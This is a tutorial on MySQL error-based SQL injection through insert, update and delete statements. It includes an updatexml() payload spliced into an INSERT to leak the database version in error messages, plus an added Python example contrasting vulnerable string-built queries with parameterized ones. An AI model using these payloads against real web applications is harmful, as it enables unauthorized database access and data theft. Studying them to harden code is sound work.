Getting data through insert, update, and delete injection
0x00
SQL injection can be used to extract data from a database. The techniques fall roughly into four groups: union queries, error-based injection, Boolean blind injection, and time-based (delayed) injection. These are generally implemented against injection points in select statements. When the injection point is in an insert, update, or delete statement instead (for example, a site that logs visitor details such as referer, client_ip, and user-agent, or a feature such as user registration, password modification, or information deletion), can the same methods still return the data we need? Here we take MySQL error-based injection as an example to see how to obtain the desired data from insert, update, and delete injection points.
0x01 environment setup
To better demonstrate the injection effect, we first use the following statements to create the original data:
create database newdb;
use newdb;
create table users(id int(3) not null auto_increment, username varchar(20) not null, password varchar(20) not null, primary key (id));
insert into users values(1,'Jane','Eyre');
Take a look at the current data structure:
0x02 injection syntax
Because error-based injection is used here, the idea is to place input like the following into the insert, update, or delete statement so that it produces a syntax error:
insert into users (id, username, password) values (2,''inject here'','Olivia');
insert into users (id, username, password) values (2,""inject here"",'Olivia');
Note: the injection lands in the username field. Entering 'inject here' in one statement and "inject here" in the other is what causes the error; one uses single quotation marks and the other double quotation marks. The input must be constructed flexibly according to how the actual injection point is quoted.
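0x03 use updatexml() to obtain data
updatexml() is a MySQL XML function that uses an XPath expression to query and modify XML document data. When its XPath argument is not a valid XPath expression, MySQL raises an error that includes that argument, which is how the result of the inner query ends up in the error message.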
Payload:
or updatexml(1,concat(0x7e,(version())),0) or
Insert:
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(version())),0) or'', 'Nervo');
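A defender's view of the statement above, as an added example that is not part of the original article: the same username value sent through a string-built INSERT and through a parameterized one. Python's sqlite3 stands in for MySQL so that it runs offline (an assumption; SQLite has no updatexml(), so the spliced payload fails with a different error), and all function names are hypothetical.

```python
import sqlite3

# The page's payload as it would arrive in the username field (constructed input).
PAYLOAD = "Olivia' or updatexml(1,concat(0x7e,(version())),0) or'"

def make_db():
    """In-memory stand-in for the page's newdb.users table."""
    db = sqlite3.connect(":memory:")
    db.execute("create table users(id integer primary key, "
               "username varchar(20) not null, password varchar(20) not null)")
    db.execute("insert into users values (1, 'Jane', 'Eyre')")
    return db

def insert_concatenated(db, uid, username, password):
    """Vulnerable: input is spliced into the statement text, and the raw
    database error is returned to the caller (the page's explicit error mode)."""
    sql = ("insert into users (id, username, password) values "
           f"({uid}, '{username}', '{password}')")
    try:
        db.execute(sql)
        return "ok"
    except sqlite3.Error as exc:
        return f"error: {exc}"

def insert_parameterized(db, uid, username, password):
    """Hardened: the statement text is fixed, input travels as bound values,
    and no database error text is returned to the caller."""
    try:
        db.execute("insert into users (id, username, password) values (?, ?, ?)",
                   (uid, username, password))
        return "ok"
    except sqlite3.Error:
        return "error"

def stored_username(db, uid):
    """Return the username stored for uid, or None if no such row exists."""
    row = db.execute("select username from users where id = ?", (uid,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    print(insert_concatenated(db, 2, PAYLOAD, "Nervo"))   # payload parsed as SQL
    print(insert_parameterized(db, 3, PAYLOAD, "Nervo"))  # payload stored as text
    print(stored_username(db, 3))
```

SQLite does not enforce the varchar(20) length, so the bound payload is stored whole; MySQL in strict mode would reject it as too long, still without parsing it as SQL.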